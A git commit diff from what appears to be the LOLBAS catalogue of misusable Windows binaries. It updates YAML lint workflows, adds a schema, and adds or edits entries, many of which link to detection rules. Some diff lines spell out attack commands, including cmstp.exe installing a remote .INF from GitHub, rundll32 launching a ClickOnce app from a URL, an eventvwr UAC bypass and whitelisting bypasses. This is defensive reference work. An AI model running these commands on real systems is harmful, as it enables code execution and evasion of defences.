Merge remote-tracking branch 'upstream/master' into windows_11_sprint

This commit is contained in:
Wietze 2022-10-03 16:16:30 +01:00
commit 67e1040172
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
176 changed files with 502 additions and 341 deletions

8
.github/.yamllint vendored
View File

@ -4,12 +4,12 @@ yaml-files:
- '*.yml'
rules:
new-line-at-end-of-file:
level: warning
level: error
trailing-spaces:
level: warning
level: error
line-length:
level: warning
new-lines:
level: warning
level: error
indentation:
level: warning
level: error

View File

@ -16,7 +16,7 @@ jobs:
- name: Change .yml to .md
run: |
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts

View File

@ -1,19 +1,35 @@
---
name: YAML Lint
on:
push:
branches:
- master
pull_request:
branches:
- master
name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
on: [push,pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v1
- uses: actions/checkout@v3
- name: yaml-lint
uses: ibiqlik/action-yamllint@v3
with:
no_warnings: true
file_or_dir: yml/**/*.yml
config_file: .github/.yamllint
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml

35
.github/yaml-lint-reviewdog.yml.bak vendored Normal file
View File

@ -0,0 +1,35 @@
---
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
on: [pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run yamllint
uses: reviewdog/action-yamllint@v1
with:
level: error
reporter: github-pr-review # Change reporter.
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

View File

@ -23,4 +23,3 @@ Resources:
Acknowledgement:
- Person: Bart
Handle: '@bartblaze'
---

View File

@ -15,4 +15,3 @@ Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe'
Detection:
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---

View File

@ -25,4 +25,3 @@ Acknowledgement:
Handle: '@@vysecurity'
- Person: Adam (Internals)
Handle: '@Hexacorn'
---

118
YML-Schema.yml Normal file
View File

@ -0,0 +1,118 @@
---
type: map
mapping:
# Id field enhancement possibility commenting out for now
# "Id":
# type: str
# required: true
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
"Name":
type: str
required: true
"Description":
type: str
required: true
"Aliases":
type: seq
required: false
sequence:
- type: map
mapping:
"Alias":
type: str
required: false
"Author":
type: str
required: true
"Created":
type: date
required: true
"Commands":
type: seq
required: true
sequence:
- type: map
mapping:
"Command":
type: str
required: true
"Description":
type: str
required: true
"Usecase":
type: str
required: true
"Category":
type: str
required: true
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
"Privileges":
type: str
required: true
"MitreID":
type: str
required: true
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
"OperatingSystem":
type: str
required: true
"Full_Path":
type: seq
required: true
sequence:
- type: map
mapping:
"Path":
type: str
required: true
"Code_Sample":
type: seq
required: false
sequence:
- type: map
mapping:
"Code":
type: str
"Detection":
type: seq
required: false
sequence:
- type: map
mapping:
"IOC":
type: str
"Sigma":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Analysis":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Elastic":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Splunk":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"BlockRule":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Resources":
type: seq
required: false
sequence:
- type: map
mapping:
"Link":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Acknowledgement":
type: seq
required: false
sequence:
- type: map
mapping:
"Person":
type: str
"Handle":
type: str
pattern: '^(@(\w){1,15})?$'

View File

@ -1,11 +1,15 @@
---
Name: Binary.exe
Description: Something general about the binary
Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality,
- Alias: Binary64.exe # but for example, is built for different architecture.
Author: The name of the person that created this file
Created: YYYY-MM-DD (date the person created this file)
Commands:
- Command: The command
Description: Description of the command
Aliases:
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
Usecase: A description of the usecase
Category: Execute
Privileges: Required privs

View File

@ -20,4 +20,3 @@ Resources:
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: cpl
Handle: '@cpl3h'
---

View File

@ -23,7 +23,7 @@ Detection:
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
Resources:
- Link: https://freddiebarrsmith.com/at.txt
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
Acknowledgement:
- Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
Handle:
- Person: 'Xabier Ugarte-Pedrero'
Handle:
---

View File

@ -14,8 +14,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
@ -27,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---

View File

@ -48,4 +48,3 @@ Acknowledgement:
Handle: '@aionescu'
- Person: Asif Matadar
Handle: '@d1r4c'
---

View File

@ -46,7 +46,7 @@ Detection:
- IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream
Resources:
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@carnal0wnage'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Ensar Samil
Handle: '@sblmsrsn'
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: David Middlehurst
Handle: '@dtmsecurity'
---

View File

@ -39,7 +39,7 @@ Commands:
Privileges: User
MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures
Category: Decode
@ -75,4 +75,3 @@ Acknowledgement:
- Person: egre55
Handle: '@egre55'
- Person: Lior Adar
---

View File

@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
@ -34,4 +32,3 @@ Resources:
Acknowledgement:
- Person: r0lan
Handle: '@yeyint_mth'
---

View File

@ -14,8 +14,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
Resources:
@ -24,4 +22,3 @@ Resources:
Acknowledgement:
- Person:
Handle:
---

View File

@ -23,4 +23,3 @@ Resources:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -14,15 +14,13 @@ Commands:
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
@ -44,4 +42,3 @@ Acknowledgement:
Handle: '@oddvarmoe'
- Person: Nick Tyrer
Handle: '@NickTyrer'
---

View File

@ -29,4 +29,3 @@ Resources:
Acknowledgement:
- Person: Ialle Teixeira
Handle: '@NtSetDefault'
---

View File

@ -24,4 +24,3 @@ Acknowledgement:
Handle: '@hexacorn'
- Person: Wietze
Handle: '@wietze'
---

View File

@ -15,7 +15,7 @@ Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person:
Handle:
---

View File

@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -0,0 +1,23 @@
---
Name: CustomShellHost.exe
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
Author: 'Wietze Beukema'
Created: 2021-11-14
Commands:
- Command: CustomShellHost.exe
Description: Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.
Usecase: Can be used to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\CustomShellHost.exe
Detection:
- IOC: CustomShellHost.exe is unlikely to run on normal workstations
Resources:
- Link: https://twitter.com/YoSignals/status/1381353520088113154
- Link: https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher
Acknowledgement:
- Person: John Carroll
Handle: '@YoSignals'

View File

@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Ialle Teixeira
Handle: '@NtSetDefault'
---

View File

@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Gal Kristal
Handle: '@gal_kristal'
---

View File

@ -0,0 +1,20 @@
---
Name: DeviceCredentialDeployment.exe
Description: Device Credential Deployment
Author: 'Elliot Killick'
Created: '2021-08-16'
Commands:
- Command: DeviceCredentialDeployment
Description: Grab the console window handle and set it to hidden
Usecase: Can be used to stealthily run a console application (e.g. cmd.exe) in the background
Category: Conceal
Privileges: User
MitreID: T1564
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\System32\DeviceCredentialDeployment.exe
Detection:
- IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'

View File

@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -17,7 +17,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
Resources:
@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@tim8288'
- Person: Hai Vaknin
Handle: '@vakninhai'
---

View File

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -15,7 +15,7 @@ Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
@ -32,4 +32,3 @@ Acknowledgement:
Handle: '@dim0x69'
- Person: Nikhil SamratAshok
Handle: '@nikhil_mitt'
---

View File

@ -51,7 +51,7 @@ Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
@ -67,5 +67,4 @@ Acknowledgement:
- Person: egre55
Handle: '@egre55'
- Person: Mike Cary
Handle: 'grayfold3d'
---
Handle: '@grayfold3d'

View File

@ -7,7 +7,7 @@ Commands:
- Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC bypass
Category: UAC Bypass
Privileges: User
MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@enigma0x3'
- Person: Matt Graeber
Handle: '@mattifestation'
---

View File

@ -29,7 +29,7 @@ Full_Path:
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
@ -41,4 +41,3 @@ Acknowledgement:
Handle: '@infosecn1nja'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@CyberRaiju'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -1,6 +1,6 @@
---
Name: Extexport.exe
Description:
Description: Load a DLL located in the c:\test folder with a specific name.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---

View File

@ -1,6 +1,6 @@
---
Name: Extrac32.exe
Description:
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -54,4 +54,3 @@ Acknowledgement:
Handle: '@VakninHai'
- Person: Tamir Yehuda
Handle: '@tim8288'
---

View File

@ -1,6 +1,6 @@
---
Name: Findstr.exe
Description:
Description: Write to ADS, discover, or download files with Findstr.exe
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -36,7 +36,7 @@ Full_Path:
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
Resources:
@ -45,4 +45,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -28,4 +28,3 @@ Acknowledgement:
Handle: '@Ocelotty6669'
- Person: Malwrologist
Handle: '@DissectMalware'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Carlos Perez
Handle: '@Carlos_Perez'
---

View File

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
Resources:
@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@vector_sec'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
- IOC: cmd /c as child process of ftp.exe
@ -37,5 +37,4 @@ Acknowledgement:
- Person: BennyHusted
Handle: ''
- Person: Amit Serper
Handle: '@0xAmit '
---
Handle: '@0xAmit'

View File

@ -176,4 +176,3 @@ Resources:
Acknowledgement:
- Person: Jesus Galvez
Handle:
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -35,4 +35,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -20,4 +20,3 @@ Resources:
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---

View File

@ -1,6 +1,6 @@
---
Name: Ie4uinit.exe
Description:
Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -33,4 +33,3 @@ Acknowledgement:
Handle: '@VakninHai'
- Person: Lior Adar
Handle:
---

View File

@ -15,7 +15,7 @@ Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Kyle Hanslovan
Handle: '@kylehanslovan'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -24,7 +24,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
@ -39,4 +39,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Malwrologist
Handle: '@DissectMalware'
---

30
yml/OSBinaries/Ldifde.yml Normal file
View File

@ -0,0 +1,30 @@
---
Name: Ldifde.exe
Description: Creates, modifies, and deletes LDAP directory objects.
Author: 'Grzegorz Tworek'
Created: 2022-08-31
Commands:
- Command: Ldifde -i -f inputfile.ldf
Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
Usecase: Download file from Internet
Category: Download
Privileges: Administrator
MitreID: T1105
OperatingSystem: Windows Server with AD Domain Services role, Windows 10 with AD LDS role.
Full_Path:
- Path: c:\windows\system32\ldifde.exe
- Path: c:\windows\syswow64\ldifde.exe
Code_Sample:
- Code:
Detection:
- IOC:
- Analysis:
- Sigma:
- Elastic:
- Splunk:
- BlockRule:
Resources:
- Link: https://twitter.com/0gtweet/status/1564968845726580736
Acknowledgement:
- Person: Grzegorz Tworek
Handle: '@0gtweet'

View File

@ -40,4 +40,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@gN3mes1s'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@FortyNorthSec'
- Person: Bank Security
Handle: '@Bank_Security'
---

View File

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@bohops'
- Person: clem
Handle: '@clavoillotte'
---

View File

@ -53,4 +53,3 @@ Acknowledgement:
Handle: ''
- Person: Cedric
Handle: '@th3c3dr1c'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -78,4 +78,3 @@ Acknowledgement:
Handle: '@Cneelis'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

View File

@ -14,7 +14,7 @@ Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person:
Handle:
---

View File

@ -69,4 +69,3 @@ Acknowledgement:
Handle: '@subtee'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -51,4 +51,3 @@ Acknowledgement:
Handle: '@netbiosX'
- Person: Philip Tsukerman
Handle: '@PhilipTsukerman'
---

View File

@ -34,4 +34,3 @@ Acknowledgement:
Handle:
- Person: 'Xabier Ugarte-Pedrero'
Handle:
---

View File

@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@subtee'
- Person: Adam
Handle: '@Hexacorn'
---

View File

@ -19,4 +19,3 @@ Detection:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -21,4 +21,3 @@ Resources:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -38,4 +38,3 @@ Acknowledgement:
Handle: '@kylehanslovan'
- Person: Fab
Handle: '@0rbz_'
---

View File

@ -22,4 +22,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

View File

@ -31,4 +31,3 @@ Resources:
Acknowledgement:
- Person: Derek Johnson
Handle: ''
---

View File

@ -22,4 +22,3 @@ Acknowledgement:
Handle: '@LuxNoBulIshit'
- Person: Avihay eldad
Handle: '@aloneliassaf'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -40,4 +40,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -28,4 +28,3 @@ Resources:
